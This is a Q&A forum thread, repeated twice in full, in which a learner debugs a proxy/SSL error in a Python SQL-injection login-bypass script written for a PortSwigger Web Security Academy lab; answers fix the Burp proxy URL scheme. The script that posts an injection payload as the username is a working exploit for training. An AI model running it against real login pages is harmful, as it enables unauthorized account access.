proxy max retries exceeded with url
Question:
am following a tutorial on Youtube where we learn SQL injection on portswigger platform
and we write the exploit as script with python, am using kali linux as virtual machine, am suffering from proxy error and i didn’t know what to search for other than stackoverflow with no benefit answers. now here is my python code first :
import requests
import sys
import urllib3
from bs4 import BeautifulSoup
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# the purpose of proxy is to proxy to myself in order to pass my request through burpsuit
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}
def get_csrf_token(s, url):
r = s.get(url, verify=False, proxies=proxies)
soup = BeautifulSoup(r.text, 'html.parser')
csrf = soup.find("input")['value']
return csrf
def exploit_sqli(s, url, payload):
csrf = get_csrf_token(s, url)
data = {"csrf": csrf,
"username": payload,
"password": "randomtext"}
r = s.post(url, data=data, verify=False, proxies=proxies)
res = r.text
if "Log out" in res:
return True
else:
return False
if __name__ == "__main__":
try:
url = sys.argv[1].strip()
sqli_payload = sys.argv[2].strip()
except IndexError:
print('[-] Usage: %s <url> <sql-payload>' % sys.argv[0])
print('[-] Example: %s www.example.com "1=1"' % sys.argv[0])
s = requests.Session()
if exploit_sqli(s, url, sqli_payload):
print('[+] SQL injection successful! We have logged in as the administrator user.')
else:
print('[-] SQL injection unsuccessful.')
and am suffering of runtime error and here is my track trace:
Traceback (most recent call last): File
"/home/kali/.local/lib/python3.10/site-packages/urllib3/connectionpool.py",
line 700, in urlopen
self._prepare_proxy(conn) File "/home/kali/.local/lib/python3.10/site-packages/urllib3/connectionpool.py",
line 996, in _prepare_proxy
conn.connect() File "/home/kali/.local/lib/python3.10/site-packages/urllib3/connection.py",
line 364, in connect
self.sock = conn = self._connect_tls_proxy(hostname, conn) File "/home/kali/.local/lib/python3.10/site-packages/urllib3/connection.py",
line 499, in connect_tls_proxy
socket = ssl_wrap_socket( File "/home/kali/.local/lib/python3.10/site-packages/urllib3/util/ssl.py",
line 453, in ssl_wrap_socket
ssl_sock = ssl_wrap_socket_impl(sock, context, tls_in_tls) File "/home/kali/.local/lib/python3.10/site-packages/urllib3/util/ssl.py",
line 495, in _ssl_wrap_socket_impl
return ssl_context.wrap_socket(sock) File "/usr/lib/python3.10/ssl.py", line 513, in wrap_socket
return self.sslsocket_class._create( File "/usr/lib/python3.10/ssl.py", line 1071, in _create
self.do_handshake() File "/usr/lib/python3.10/ssl.py", line 1342, in do_handshake
self._sslobj.do_handshake() ssl.SSLError: [SSL: WRONG_VERSION_NUMBER] wrong version number (_ssl.c:997)
During handling of the above exception, another exception occurred:
Traceback (most recent call last): File
"/home/kali/.local/lib/python3.10/site-packages/requests/adapters.py",
line 489, in send
resp = conn.urlopen( File "/home/kali/.local/lib/python3.10/site-packages/urllib3/connectionpool.py",
line 787, in urlopen
retries = retries.increment( File "/home/kali/.local/lib/python3.10/site-packages/urllib3/util/retry.py",
line 592, in increment
raise MaxRetryError(_pool, url, error or ResponseError(cause)) urllib3.exceptions.MaxRetryError:
HTTPSConnectionPool(host=’0a0000f503d3bb1ac1b8273000b600cb.web-security-academy.net’,
port=443): Max retries exceeded with url: /login (Caused by
ProxyError(‘Your proxy appears to only use HTTP and not HTTPS, try
changing your proxy URL to be HTTP. See:
https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#https-proxy-error-http-proxy’,
SSLError(SSLError(1, ‘[SSL: WRONG_VERSION_NUMBER] wrong version number
(_ssl.c:997)’))))
During handling of the above exception, another exception occurred:
Traceback (most recent call last): File
"/home/kali/Desktop/machines/portSwiggerLabs/sqlInjection/lab-02/sql-lab-02.py",
line 43, in
if exploit_sqli(s, url, sqli_payload): File "/home/kali/Desktop/machines/portSwiggerLabs/sqlInjection/lab-02/sql-lab-02.py",
line 21, in exploit_sqli
csrf = get_csrf_token(s, url) File "/home/kali/Desktop/machines/portSwiggerLabs/sqlInjection/lab-02/sql-lab-02.py",
line 12, in get_csrf_token
r = s.get(url, verify=False, proxies=proxies) File "/home/kali/.local/lib/python3.10/site-packages/requests/sessions.py",
line 600, in get
return self.request("GET", url, **kwargs) File "/home/kali/.local/lib/python3.10/site-packages/requests/sessions.py",
line 587, in request
resp = self.send(prep, **send_kwargs) File "/home/kali/.local/lib/python3.10/site-packages/requests/sessions.py",
line 701, in send
r = adapter.send(request, **kwargs) File "/home/kali/.local/lib/python3.10/site-packages/requests/adapters.py",
line 559, in send
raise ProxyError(e, request=request) requests.exceptions.ProxyError:
HTTPSConnectionPool(host=’0a0000f503d3bb1ac1b8273000b600cb.web-security-academy.net’,
port=443): Max retries exceeded with url: /login (Caused by
ProxyError(‘Your proxy appears to only use HTTP and not HTTPS, try
changing your proxy URL to be HTTP. See:
https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#https-proxy-error-http-proxy’,
SSLError(SSLError(1, ‘[SSL: WRONG_VERSION_NUMBER] wrong version number
(_ssl.c:997)’))))
i tried to check my localhost(127.0.0.1) ip if it’s another one or maybe not configured or anything related and I didn’t reach any result
Answers:
Not entirely sure, but by looking at the part of your stack trace:
Caused by ProxyError('Your proxy appears to only use HTTP and not HTTPS, try changing your proxy URL to be HTTP. See: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#https-proxy-error-http-proxy', SSLError(SSLError(1, '[SSL: WRONG_VERSION_NUMBER] wrong version number (_ssl.c:997)'))))
I would say to try only using an http url rather than an https as the argument you are passing to the script.
am answering my question after few searches after few days
first I debugged that my proxy didn’t receive my requests from python
I searched and found this tutorial https://www.th3r3p0.com/random/python-requests-and-burp-suite.html to set linux environmental variables
and I edited my code to
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
since also burp it’s default is http
am following a tutorial on Youtube where we learn SQL injection on portswigger platform
and we write the exploit as script with python, am using kali linux as virtual machine, am suffering from proxy error and i didn’t know what to search for other than stackoverflow with no benefit answers. now here is my python code first :
import requests
import sys
import urllib3
from bs4 import BeautifulSoup
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# the purpose of proxy is to proxy to myself in order to pass my request through burpsuit
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}
def get_csrf_token(s, url):
r = s.get(url, verify=False, proxies=proxies)
soup = BeautifulSoup(r.text, 'html.parser')
csrf = soup.find("input")['value']
return csrf
def exploit_sqli(s, url, payload):
csrf = get_csrf_token(s, url)
data = {"csrf": csrf,
"username": payload,
"password": "randomtext"}
r = s.post(url, data=data, verify=False, proxies=proxies)
res = r.text
if "Log out" in res:
return True
else:
return False
if __name__ == "__main__":
try:
url = sys.argv[1].strip()
sqli_payload = sys.argv[2].strip()
except IndexError:
print('[-] Usage: %s <url> <sql-payload>' % sys.argv[0])
print('[-] Example: %s www.example.com "1=1"' % sys.argv[0])
s = requests.Session()
if exploit_sqli(s, url, sqli_payload):
print('[+] SQL injection successful! We have logged in as the administrator user.')
else:
print('[-] SQL injection unsuccessful.')
and am suffering of runtime error and here is my track trace:
Traceback (most recent call last): File
"/home/kali/.local/lib/python3.10/site-packages/urllib3/connectionpool.py",
line 700, in urlopen
self._prepare_proxy(conn) File "/home/kali/.local/lib/python3.10/site-packages/urllib3/connectionpool.py",
line 996, in _prepare_proxy
conn.connect() File "/home/kali/.local/lib/python3.10/site-packages/urllib3/connection.py",
line 364, in connect
self.sock = conn = self._connect_tls_proxy(hostname, conn) File "/home/kali/.local/lib/python3.10/site-packages/urllib3/connection.py",
line 499, in connect_tls_proxy
socket = ssl_wrap_socket( File "/home/kali/.local/lib/python3.10/site-packages/urllib3/util/ssl.py",
line 453, in ssl_wrap_socket
ssl_sock = ssl_wrap_socket_impl(sock, context, tls_in_tls) File "/home/kali/.local/lib/python3.10/site-packages/urllib3/util/ssl.py",
line 495, in _ssl_wrap_socket_impl
return ssl_context.wrap_socket(sock) File "/usr/lib/python3.10/ssl.py", line 513, in wrap_socket
return self.sslsocket_class._create( File "/usr/lib/python3.10/ssl.py", line 1071, in _create
self.do_handshake() File "/usr/lib/python3.10/ssl.py", line 1342, in do_handshake
self._sslobj.do_handshake() ssl.SSLError: [SSL: WRONG_VERSION_NUMBER] wrong version number (_ssl.c:997)During handling of the above exception, another exception occurred:
Traceback (most recent call last): File
"/home/kali/.local/lib/python3.10/site-packages/requests/adapters.py",
line 489, in send
resp = conn.urlopen( File "/home/kali/.local/lib/python3.10/site-packages/urllib3/connectionpool.py",
line 787, in urlopen
retries = retries.increment( File "/home/kali/.local/lib/python3.10/site-packages/urllib3/util/retry.py",
line 592, in increment
raise MaxRetryError(_pool, url, error or ResponseError(cause)) urllib3.exceptions.MaxRetryError:
HTTPSConnectionPool(host=’0a0000f503d3bb1ac1b8273000b600cb.web-security-academy.net’,
port=443): Max retries exceeded with url: /login (Caused by
ProxyError(‘Your proxy appears to only use HTTP and not HTTPS, try
changing your proxy URL to be HTTP. See:
https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#https-proxy-error-http-proxy’,
SSLError(SSLError(1, ‘[SSL: WRONG_VERSION_NUMBER] wrong version number
(_ssl.c:997)’))))During handling of the above exception, another exception occurred:
Traceback (most recent call last): File
"/home/kali/Desktop/machines/portSwiggerLabs/sqlInjection/lab-02/sql-lab-02.py",
line 43, in
if exploit_sqli(s, url, sqli_payload): File "/home/kali/Desktop/machines/portSwiggerLabs/sqlInjection/lab-02/sql-lab-02.py",
line 21, in exploit_sqli
csrf = get_csrf_token(s, url) File "/home/kali/Desktop/machines/portSwiggerLabs/sqlInjection/lab-02/sql-lab-02.py",
line 12, in get_csrf_token
r = s.get(url, verify=False, proxies=proxies) File "/home/kali/.local/lib/python3.10/site-packages/requests/sessions.py",
line 600, in get
return self.request("GET", url, **kwargs) File "/home/kali/.local/lib/python3.10/site-packages/requests/sessions.py",
line 587, in request
resp = self.send(prep, **send_kwargs) File "/home/kali/.local/lib/python3.10/site-packages/requests/sessions.py",
line 701, in send
r = adapter.send(request, **kwargs) File "/home/kali/.local/lib/python3.10/site-packages/requests/adapters.py",
line 559, in send
raise ProxyError(e, request=request) requests.exceptions.ProxyError:
HTTPSConnectionPool(host=’0a0000f503d3bb1ac1b8273000b600cb.web-security-academy.net’,
port=443): Max retries exceeded with url: /login (Caused by
ProxyError(‘Your proxy appears to only use HTTP and not HTTPS, try
changing your proxy URL to be HTTP. See:
https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#https-proxy-error-http-proxy’,
SSLError(SSLError(1, ‘[SSL: WRONG_VERSION_NUMBER] wrong version number
(_ssl.c:997)’))))
i tried to check my localhost(127.0.0.1) ip if it’s another one or maybe not configured or anything related and I didn’t reach any result
Not entirely sure, but by looking at the part of your stack trace:
Caused by ProxyError('Your proxy appears to only use HTTP and not HTTPS, try changing your proxy URL to be HTTP. See: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#https-proxy-error-http-proxy', SSLError(SSLError(1, '[SSL: WRONG_VERSION_NUMBER] wrong version number (_ssl.c:997)'))))
I would say to try only using an http url rather than an https as the argument you are passing to the script.
am answering my question after few searches after few days
first I debugged that my proxy didn’t receive my requests from python
I searched and found this tutorial https://www.th3r3p0.com/random/python-requests-and-burp-suite.html to set linux environmental variables
and I edited my code to
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
since also burp it’s default is http